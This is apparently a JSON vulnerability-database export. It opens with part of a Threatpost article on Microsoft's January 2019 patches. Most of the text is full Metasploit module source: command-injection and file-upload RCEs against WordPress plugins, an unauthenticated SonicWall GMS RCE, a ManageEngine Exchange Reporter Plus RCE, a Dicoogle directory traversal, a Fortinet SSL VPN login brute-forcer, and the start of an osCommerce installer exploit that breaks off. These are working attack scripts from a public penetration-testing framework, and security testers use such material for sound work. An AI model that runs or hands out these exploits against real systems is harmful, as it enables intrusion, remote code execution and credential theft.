get the update, you\u2019ll need to manually access the Google Play store and update the Skype app from there,\u201d wrote [Zero Day Initiative in its Patch Tuesday commentary](<https://www.zerodayinitiative.com/blog/2019/1/8/the-january-2019-security-update-review>).\n\nSatnam Narang, senior research engineer at Tenable, noted in an email commentary to Threatpost:\n\n\u201cThe most noteworthy vulnerability in today\u2019s Microsoft Patch Tuesday release is a remote code execution flaw in the Windows DHCP client ([CVE-2019-0547](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0547>)), which is the highest rated CVE this month. In order to exploit the vulnerability, an attacker would need to be able to send a specially crafted DHCP response to its target, allowing them to run arbitrary code on the client machine.\u201d\n\nThe bug has a CVSS score of 9.8 and impacts the latest versions of Windows 10 (version 1803) and Windows Server (version 1803).\n\n\u201cThere are also multiple elevation of privilege vulnerabilities in the Windows Data Sharing Service that were patched this month,\u201d Narang wrote. \u201cAn attacker could use these vulnerabilities to elevate privileges while on an affected system. This follows the public disclosure via Twitter of a zero-day elevation of privilege vulnerability in the Windows Data Sharing service back in October.\u201d\n\nDespite the fact it was not part of this month\u2019s round of patches, Allan Liska, senior solutions architect at Recorded Future, notes much of the attention in the security world is still on the [December out of band patch that Microsoft issued for the Internet Explorer](<https://threatpost.com/microsoft-ie-zero-day-gets-emergency-patch/140185/>) Memory Corruption Vulnerability (CVE-2018-8653).\n\n\u201cThat vulnerability continues to be exploited in the wild and Recorded Future has seen several exploit kits incorporate the released proof of concept code into their platforms. If you have not patched this vulnerability yet, it should be the number one priority,\u201d Liska said.\n", "modified": "2019-01-08T20:49:06", "published": "2019-01-08T20:49:06", "id": "THREATPOST:0E04AFD877241B022A86CB6ED5FA7C20", "href": "https://threatpost.com/microsoft-issues-multiple-critical-patches-for-edge-browser/140652/", "type": "threatpost", "title": "Microsoft Issues Multiple Critical Patches for Edge Browser", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-12-12T23:11:24", "bulletinFamily": "exploit", "description": "There exists a command injection vulnerability in the Wordpress plugin `wp-database-backup` for versions < 5.2. For the backup functionality, the plugin generates a `mysqldump` command to execute. The user can choose specific tables to exclude from the backup by setting the `wp_db_exclude_table` parameter in a POST request to the `wp-database-backup` page. The names of the excluded tables are included in the `mysqldump` command unsanitized. Arbitrary commands injected through the `wp_db_exclude_table` parameter are executed each time the functionality for creating a new database backup are run. Authentication is required to successfully exploit this vulnerability.\n", "modified": "2019-07-23T17:20:14", "published": "2019-06-20T19:05:41", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_DB_BACKUP_RCE", "href": "", "type": "metasploit", "title": "WP Database Backup RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WP Database Backup RCE',\n 'Description' => %q(\n There exists a command injection vulnerability in the Wordpress plugin\n `wp-database-backup` for versions < 5.2.\n\n For the backup functionality, the plugin generates a `mysqldump` command\n to execute. The user can choose specific tables to exclude from the backup\n by setting the `wp_db_exclude_table` parameter in a POST request to the\n `wp-database-backup` page. The names of the excluded tables are included in\n the `mysqldump` command unsanitized. Arbitrary commands injected through the\n `wp_db_exclude_table` parameter are executed each time the functionality\n for creating a new database backup are run.\n\n Authentication is required to successfully exploit this vulnerability.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Mikey Veenstra / Wordfence', # Vulnerability Discovery\n 'Shelby Pace' # Metasploit module\n ],\n 'References' =>\n [\n [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],\n ],\n 'Platform' => [ 'win', 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Targets' =>\n [\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86, ARCH_X64 ]\n }\n ],\n [\n 'Linux',\n {\n 'Platform' => 'linux',\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'CmdStagerFlavor' => 'printf'\n }\n ]\n ],\n 'DisclosureDate' => '2019-04-24',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),\n OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),\n OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])\n ])\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => changelog_uri\n )\n\n if res && res.code == 200\n version = res.body.match(/=+\\s(\\d+\\.\\d+)\\.?\\d*\\s=/)\n return CheckCode::Detected unless version && version.length > 1\n\n vprint_status(\"Version of wp-database-backup detected: #{version[1]}\")\n return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')\n end\n CheckCode::Safe\n end\n\n def exploit\n cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie\n\n res = create_exclude_table(cookie)\n nonce = get_nonce(res)\n create_backup(cookie, nonce)\n\n clear_exclude_table(cookie)\n end\n\n def create_exclude_table(cookie)\n @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_get' => { 'page' => 'wp-database-backup' }\n )\n\n fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200\n print_good('Reached the wp-database-backup settings page')\n if datastore['TARGET'] == 1\n comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')\n comm_payload = comm_payload.join('&&')\n comm_payload = comm_payload.gsub('\\'', '')\n comm_payload = \"; #{comm_payload} ;\"\n else\n comm_payload = \" & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::\"\n end\n\n table_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_post' =>\n {\n 'wpsetting' => 'Save',\n 'wp_db_exclude_table[wp_comment]' => comm_payload\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code\n print_good('Successfully added payload as an excluded table')\n\n res.get_html_document\n end\n\n def get_nonce(response)\n fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response\n\n div_res = response.at('p[@class=\"submit\"]')\n fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res\n\n wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)\n fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1\n\n wpnonce[1]\n end\n\n def create_backup(cookie, nonce)\n first_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_get' =>\n {\n 'page' => 'wp-database-backup',\n '_wpnonce' => nonce,\n 'action' => 'createdbbackup'\n }\n )\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_get' =>\n {\n 'page' => 'wp-database-backup',\n 'notification' => 'create'\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')\n print_good('Successfully created a backup of the database')\n end\n\n def clear_exclude_table(cookie)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => @exclude_uri,\n 'cookie' => cookie,\n 'vars_post' =>\n {\n 'wpsetting' => 'Save',\n 'wp_db_exclude_table[wp_comment]' => 'wp_comment'\n }\n )\n\n fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200\n print_good('Successfully deleted the payload from the excluded tables list')\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_db_backup_rce.rb"}, {"lastseen": "2019-12-09T09:05:37", "bulletinFamily": "exploit", "description": "This module scans for Fortinet SSL VPN web login portals and performs login brute force to identify valid credentials.\n", "modified": "2019-02-19T22:33:10", "published": "2019-02-14T08:35:02", "id": "MSF:AUXILIARY/SCANNER/HTTP/FORTINET_SSL_VPN", "href": "", "type": "metasploit", "title": "Fortinet SSL VPN Bruteforce Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Fortinet SSL VPN Bruteforce Login Utility',\n 'Description' => %{\n This module scans for Fortinet SSL VPN web login portals and\n performs login brute force to identify valid credentials.\n },\n 'Author' => [ 'Max Michels <kontakt[at]maxmichels.de>' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 443\n }\n ))\n\n register_options(\n [\n OptString.new('DOMAIN', [false, \"Domain/Realm to use for each account\", ''])\n ])\n end\n\n def run_host(ip)\n unless check_conn?\n vprint_error(\"Connection failed, Aborting...\")\n return false\n end\n\n unless is_app_ssl_vpn?\n vprint_error(\"Application does not appear to be Fortinet SSL VPN. Module will not continue.\")\n return false\n end\n\n vprint_good(\"Application appears to be Fortinet SSL VPN. Module will continue.\")\n\n vprint_status(\"Starting login brute force...\")\n each_user_pass do |user, pass|\n do_login(user, pass)\n end\n end\n\n # Verify if server is responding\n def check_conn?\n begin\n res = send_request_cgi('uri' => '/', 'method' => 'GET')\n if res\n vprint_good(\"Server is responsive...\")\n return true\n end\n rescue ::Rex::ConnectionRefused,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionError,\n ::Errno::EPIPE\n end\n false\n end\n\n def get_login_resource\n send_request_raw(\n 'uri' => '/remote/login?lang=en'\n )\n end\n\n # Verify whether we're working with SSL VPN or not\n def is_app_ssl_vpn?\n res = get_login_resource\n res && res.code == 200 && res.body.match(/fortinet/)\n end\n\n def do_logout(cookie)\n send_request_cgi(\n 'uri' => '/remote/logout',\n 'method' => 'GET',\n 'cookie' => cookie\n )\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: 'Fortinet SSL VPN',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # Brute-force the login page\n def do_login(user, pass)\n vprint_status(\"Trying username:#{user.inspect} with password:#{pass.inspect}\")\n\n begin\n post_params = {\n 'ajax' => '1',\n 'username' => user,\n 'credential' => pass\n }\n\n #check to use domain/realm or not\n if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?\n post_params['realm'] = \"\"\n else\n post_params['realm'] = datastore['DOMAIN']\n end\n\n res = send_request_cgi(\n 'uri' => '/remote/logincheck',\n 'method' => 'POST',\n 'ctype' => 'application/x-www-form-urlencoded',\n 'vars_post' => post_params\n )\n\n if res &&\n res.code == 200 &&\n res.body.match(/redir=/) &&\n res.body.match(/&portal=/)\n\n do_logout(res.get_cookies)\n if datastore['DOMAIN'].nil? || datastore['DOMAIN'].empty?\n print_good(\"SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}\")\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)\n report_note(ip: rhost, type: \"fortinet.ssl.vpn\",data: \"User: #{user}\")\n else\n print_good(\"SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{datastore[\"DOMAIN\"]}\")\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)\n report_note(ip: rhost, type: \"fortinet.ssl.vpn\",data: \"User: #{user} / Domain: #{datastore[\"DOMAIN\"]}\")\n end\n\n return :next_user\n\n else\n vprint_error(\"FAILED LOGIN - #{user.inspect}:#{pass.inspect}\")\n end\n\n rescue ::Rex::ConnectionRefused,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionError,\n ::Errno::EPIPE\n vprint_error(\"HTTP Connection Failed, Aborting\")\n return :abort\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb"}, {"lastseen": "2019-11-01T19:21:29", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.\n", "modified": "2018-07-27T04:08:20", "published": "2018-07-25T16:29:47", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_RESPONSIVE_THUMBNAIL_SLIDER_UPLOAD", "href": "", "type": "metasploit", "title": "WordPress Responsive Thumbnail Slider Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"WordPress Responsive Thumbnail Slider Arbitrary File Upload\",\n 'Description' => %q{\n This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider\n Plugin v1.0 for WordPress post authentication.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Arash Khazaei', # EDB PoC\n 'Shelby Pace' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'EDB', '37998' ]\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Aug 28 2015\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base path for WordPress\", '/' ]),\n OptString.new('WPUSERNAME', [ true, \"WordPress Username to authenticate with\", 'admin' ]),\n OptString.new('WPPASSWORD', [ true, \"WordPress Password to authenticate with\", '' ])\n ])\n end\n\n def check\n # The version regex found in extract_and_check_version does not work for this plugin's\n # readme.txt, so we build a custom one.\n check_code = check_version || check_plugin_path\n if check_code\n return check_code\n else\n return CheckCode::Safe\n end\n end\n\n def check_version\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.body && res.body =~ /Version:([\\d\\.]+)/\n version = Gem::Version.new($1)\n if version <= Gem::Version.new('1.0')\n vprint_status(\"Plugin version found: #{version}\")\n return CheckCode::Appears\n end\n end\n\n nil\n end\n\n def check_plugin_path\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.code == 200\n vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')\n return CheckCode::Detected\n end\n\n nil\n end\n\n def login\n auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])\n return fail_with(Failure::NoAccess, \"Unable to log into WordPress\") unless auth_cookies\n\n store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)\n\n print_good(\"Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}\")\n auth_cookies\n end\n\n def upload_payload(cookies)\n manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'\n file_payload = get_write_exec_payload(:unlink_self => true)\n file_name = \"#{rand_text_alpha(5)}.php\"\n\n # attempt to access plugins page\n plugin_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, manage_uri),\n 'cookie' => cookies\n )\n\n unless plugin_res && plugin_res.body.include?(\"tmpl-uploader-window\")\n fail_with(Failure::NoAccess, \"Unable to reach Responsive Thumbnail Slider Plugin Page\")\n end\n\n data = Rex::MIME::Message.new\n data.add_part(file_payload, 'image/jpeg', nil, \"form-data; name=\\\"image_name\\\"; filename=\\\"#{file_name}\\\"\")\n data.add_part(file_name.split('.')[0], nil, nil, \"form-data; name=\\\"imagetitle\\\"\")\n data.add_part('Save Changes', nil, nil, \"form-data; name=\\\"btnsave\\\"\")\n post_data = data.to_s\n\n # upload the file\n upload_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),\n 'cookie' => cookies,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)\n fail_with(Failure::Unknown, \"Unsure of successful upload\") unless (upload_res && page && page.body =~ /New\\s+image\\s+added\\s+successfully/)\n\n retrieve_file(page, cookies)\n end\n\n def retrieve_file(res, cookies)\n fname = res.body.scan(/slider\\/(.*\\.php)/).flatten[0]\n fail_with(Failure::BadConfig, \"Couldn't find file name\") if fname.empty? || fname.nil?\n file_uri = normalize_uri(target_uri.path, \"wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}\")\n\n print_good(\"Successful upload\")\n send_request_cgi(\n 'uri' => file_uri,\n 'method' => 'GET',\n 'cookie' => cookies\n )\n end\n\n def exploit\n unless check == CheckCode::Safe\n auth_cookies = login\n upload_payload(auth_cookies)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb"}, {"lastseen": "2019-12-08T08:43:20", "bulletinFamily": "exploit", "description": "This module exploits an unauthenticated directory traversal vulnerability in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an attacker to read arbitrary files with the web server privileges. While the application is java based, the directory traversal was only successful against Windows targets.\n", "modified": "2018-08-04T00:23:33", "published": "2018-07-22T01:31:45", "id": "MSF:AUXILIARY/SCANNER/HTTP/DICOOGLE_TRAVERSAL", "href": "", "type": "metasploit", "title": "Dicoogle PACS Web Server Directory Traversal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Dicoogle PACS Web Server Directory Traversal',\n 'Description' => %q{\n This module exploits an unauthenticated directory traversal vulnerability\n in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an\n attacker to read arbitrary files with the web server privileges.\n While the application is java based, the directory traversal was only\n successful against Windows targets.\n },\n 'References' =>\n [\n ['EDB', '45007']\n ],\n 'Author' =>\n [\n 'Carlos Avila', # Vulnerability discovery\n 'h00die' # Metasploit module\n ],\n 'DisclosureDate' => 'Jul 11 2018',\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']),\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 15 ])\n ])\n\n end\n\n def run_host(ip)\n filename = datastore['FILEPATH']\n traversal = \"../\" * datastore['DEPTH'] << filename\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/exportFile',\n 'vars_get' => {\n 'UID' => traversal\n }\n })\n\n unless res && res.code == 200\n print_error('Nothing was downloaded')\n return\n end\n\n vprint_good(\"#{peer} - #{res.body}\")\n path = store_loot(\n 'dicoogle.traversal',\n 'text/plain',\n ip,\n res.body,\n filename\n )\n print_good(\"File saved in: #{path}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/dicoogle_traversal.rb"}, {"lastseen": "2019-12-06T03:28:40", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in SonicWall Global Management System Virtual Appliance versions 8.1 (Build 8110.1197) and below. This virtual appliance can be downloaded from http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a holistic way to manage your entire network security environment.' These vulnerable versions (8.1 Build 8110.1197 and below) do not prevent unauthenticated, external entities from making XML-RPC requests to port 21009 of the virtual app. After the XML-RPC call is made, a shell script is called like so: 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n", "modified": "2019-03-06T23:29:15", "published": "2018-07-05T17:06:13", "id": "MSF:EXPLOIT/UNIX/SONICWALL/SONICWALL_XMLRPC_RCE", "href": "", "type": "metasploit", "title": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"SonicWall Global Management System XMLRPC set_time_zone Unauth RCE\",\n 'Description' => %q{\n This module exploits a vulnerability in SonicWall Global\n Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n and below. This virtual appliance can be downloaded from\n http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n holistic way to manage your entire network security environment.'\n\n These vulnerable versions (8.1 Build 8110.1197 and below) do not\n prevent unauthenticated, external entities from making XML-RPC\n requests to port 21009 of the virtual app. After the XML-RPC call\n is made, a shell script is called like so:\n 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Michael Flanders', #MSF Module\n 'kernelsmith' #Advisor\n ],\n 'References' => [\n ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],\n ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']\n ],\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [\n [ 'SonicWall Global Management System Virtual Appliance', {} ],\n ],\n 'Payload' => {\n # Can't use ampersand, Java's XML-RPC parser will complain and return an error\n 'BadChars' => \"\\x26\",\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic bash telnet'\n }\n },\n 'DisclosureDate' => \"Jul 22 2016\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.\n Defaults to 80/443 depending on SSL.'])\n ])\n end\n\n def check\n if datastore['WEB_SERVER_PORT']\n port_number = datastore['WEB_SERVER_PORT']\n else\n port_number = datastore['SSL'] ? '443' : '80'\n end\n\n handler = datastore['SSL'] ? 'https' : 'http'\n\n res = request_url(\"#{handler}://#{rhost}:#{port_number}\")\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Unknown\n end\n\n unless res.code == 200 && res.body =~ /<TITLE>.+v(\\d\\.\\d)/\n return CheckCode::Safe\n end\n\n version = Gem::Version.new $1.to_s\n\n unless version <= Gem::Version.new('8.1')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n fail_with Failure::NotVulnerable, \"The target is not vulnerable.\"\n end\n\n print_status \"The target appears to be vulnerable, continuing exploit...\"\n send_xml\n end\n\n def send_xml\n xml_body = <<~HERESTRING\n <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <methodCall>\n <methodName>set_time_config</methodName>\n <params>\n <param>\n <value>\n <struct>\n <member>\n <name>timezone</name>\n <value>\n <string>\"`#{payload.encoded}`\"</string>\n </value>\n </member>\n </struct>\n </value>\n </param>\n </params>\n </methodCall>\n HERESTRING\n\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => '/',\n 'data' => xml_body,\n 'ctype' => 'text/xml; charset=UTF-8'\n })\n\n unless res && res.body.include?(\"success\")\n print_error(\"Error sending XML to #{rhost}:#{rport}\")\n end\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb"}, {"lastseen": "2019-11-04T01:07:59", "bulletinFamily": "exploit", "description": "This module exploits a remote code execution vulnerability that exists in Exchange Reporter Plus <= 5310, caused by execution of bcp.exe file inside ADSHACluster servlet\n", "modified": "2018-07-12T12:27:28", "published": "2018-07-02T17:10:34", "id": "MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSHACLUSTER_RCE", "href": "", "type": "metasploit", "title": "Manage Engine Exchange Reporter Plus Unauthenticated RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Manage Engine Exchange Reporter Plus Unauthenticated RCE',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability that\n exists in Exchange Reporter Plus <= 5310, caused by execution of\n bcp.exe file inside ADSHACluster servlet\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Kacper Szurek <kacperszurek@gmail.com>'\n ],\n 'References' =>\n [\n ['URL', 'https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html']\n ],\n 'Platform' => ['win'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Automatic', {}]],\n 'DisclosureDate' => 'Jun 28 2018',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),\n Opt::RPORT(8181),\n ])\n\n end\n\n def bin_to_hex(s)\n s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')\n })\n\n unless res\n vprint_error 'Connection failed'\n return CheckCode::Safe\n end\n\n unless res.code == 200\n vprint_status 'Target is not Manage Engine Exchange Reporter Plus'\n return CheckCode::Safe\n end\n\n begin\n json = res.get_json_document\n raise if json.empty? || !json['BUILD_NUMBER']\n rescue\n vprint_status 'Target is not Manage Engine Exchange Reporter Plus'\n return CheckCode::Safe\n end\n\n vprint_status \"Version: #{json['BUILD_NUMBER']}\"\n\n if json['BUILD_NUMBER'].to_i <= 5310\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),\n 'vars_post' => {\n 'MTCALL' => \"nativeClient\",\n 'BCP_RLL' => \"0102\",\n 'BCP_EXE' => bin_to_hex(generate_payload_exe)\n }\n })\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adshacluster_rce.rb"}, {"lastseen": "2019-12-12T23:15:33", "bulletinFamily": "exploit", "description": "If the /install/ directory was not removed, it is possible for an unauthenticated attacker to run the \"install_4.php\" script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.\n", "modified": "2018-06-26T13:21:10", "published": "2018-04-06T10:29:29", "id": "MSF:EXPLOIT/MULTI/HTTP/OSCOMMERCE_INSTALLER_UNAUTH_CODE_EXEC", "href": "", "type": "metasploit", "title": "osCommerce Installer Unauthenticated Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'osCommerce Installer Unauthenticated Code Execution',\n 'Description' => %q{\n If the /install/ directory was not removed, it is possible for an unauthenticated\n attacker to run the \"install_4.php\" script, which will create the configuration\n file for the installation. This allows the attacker to inject PHP code into the\n configuration file and execute it.\n },\n 'Author' => [\n 'Simon Scannell', # Original exploit author\n 'Daniel Teixeira' # MSF module author\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['EDB', '44374'],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'osCommerce 2.3.4.1', { } ],\n ],\n 'DisclosureDate' => 'Apr 30 2018',\n 'DefaultTarget' => 0))\n register_options(\n [\n OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])\n ])\n 